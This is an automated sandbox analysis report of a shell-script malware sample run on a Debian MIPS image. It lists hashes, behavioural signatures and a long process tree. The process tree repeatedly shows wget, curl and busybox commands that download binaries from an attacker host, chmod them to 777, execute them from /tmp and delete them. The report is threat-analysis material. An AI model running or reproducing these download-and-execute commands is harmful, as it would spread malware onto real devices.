Analysis
-
max time kernel
119s -
max time network
121s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
28/10/2024, 02:22
Static task
static1
Behavioral task
behavioral1
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh
-
Size
10KB
-
MD5
9b934eb9471f7b80ea070ae4feb86150
-
SHA1
9303ecd0d513c8024a554bf860d73fe5f98cce23
-
SHA256
376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e
-
SHA512
e8b3fe4c18b161c588b07657e1609be4c3ad94a1fced10b0c828730ffb4079962bb6d7a1067c57666d9bcab83cbb6795e263783c41f9ab8aecca55f2f6ea4c83
-
SSDEEP
96:YrHTrLtXVtIgNNNNNSVBxLQMs1VZ1Vx1VAVhVlV4/T8hZcL3LlLCakqz6LUY7tNN:k2y1pifn2FXeDiY1pifn23
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh/tmp/376053c6de63b75df1b5fda98e44fcf278b064c54f3fbb009df4e8c5d1fbc36e.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:717
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:748
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:775
-
-
/bin/chmodchmod 777 YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO./YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵PID:789
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:790
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:795
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:798
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:799
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:813
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:814
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:834
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:840
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:842
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:843
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:849
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:856
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:859
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:866
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:867
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:870
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:873
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- System Network Configuration Discovery
PID:874
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:877
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:880
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:881
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:884
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:887
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:888
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:891
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:901
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:902
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:905
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:908
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/chmodchmod 777 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa2./8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 8Ob5kZdm9iyPDYdZSUjji53Q6pW6WIEoa22⤵PID:915
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:919
-
-
/bin/chmodchmod 777 ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu./ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm ElxZVuYFdCppkbe0BZzcbdshEHyIDxeFUu2⤵PID:922
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:923
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:926
-
-
/bin/chmodchmod 777 TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/TtiH17uSRwU8OtuZzPC189hS1401xDLvpo./TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm TtiH17uSRwU8OtuZzPC189hS1401xDLvpo2⤵PID:929
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:930
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- System Network Configuration Discovery
PID:933
-
-
/bin/chmodchmod 777 nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O./nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm nuXSDtodqwBvxUcGaqUfGqXJgqRpnPrd9O2⤵PID:936
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/chmodchmod 777 GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo./GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm GjKVnDe6NKncUSkk2r7Ak0F5Yi9IgcXppo2⤵PID:943
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:944
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r./TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm TgIYN8RYWWvNCPOAJifm2E3KlMEsHoVg0r2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh./BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm BRX3VpBiDtKRzxCv0AuL3MZC3wY593zIlh2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:961
-
-
/bin/chmodchmod 777 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo./78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm 78AXb6C4LgZ5833Uv8Pi7rMqBSi00mXvmo2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- System Network Configuration Discovery
PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:968
-
-
/bin/chmodchmod 777 nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh./nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm nYJJ64pzafof1y8smsyYHbDt5B5RhX9SDh2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD5./nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm nDa0JLQO2kS17WLXfUSgDUQnaisSsgbyD52⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq./JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm JB9jiEdJPPfJCrxnAessMV9LfdXAwGFFoq2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- System Network Configuration Discovery
PID:989
-
-
/bin/chmodchmod 777 T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H./T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm T1ZX8F3wJOcLXhw2HSa9yonF3iTD7CBT2H2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP./hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm hpDY9rynxE2o74TRy5nNyemaiKClmCGKSP2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YdgAc1XPNJOBSABdiX4f05Yb6a1gytRxbO2⤵
- System Network Configuration Discovery
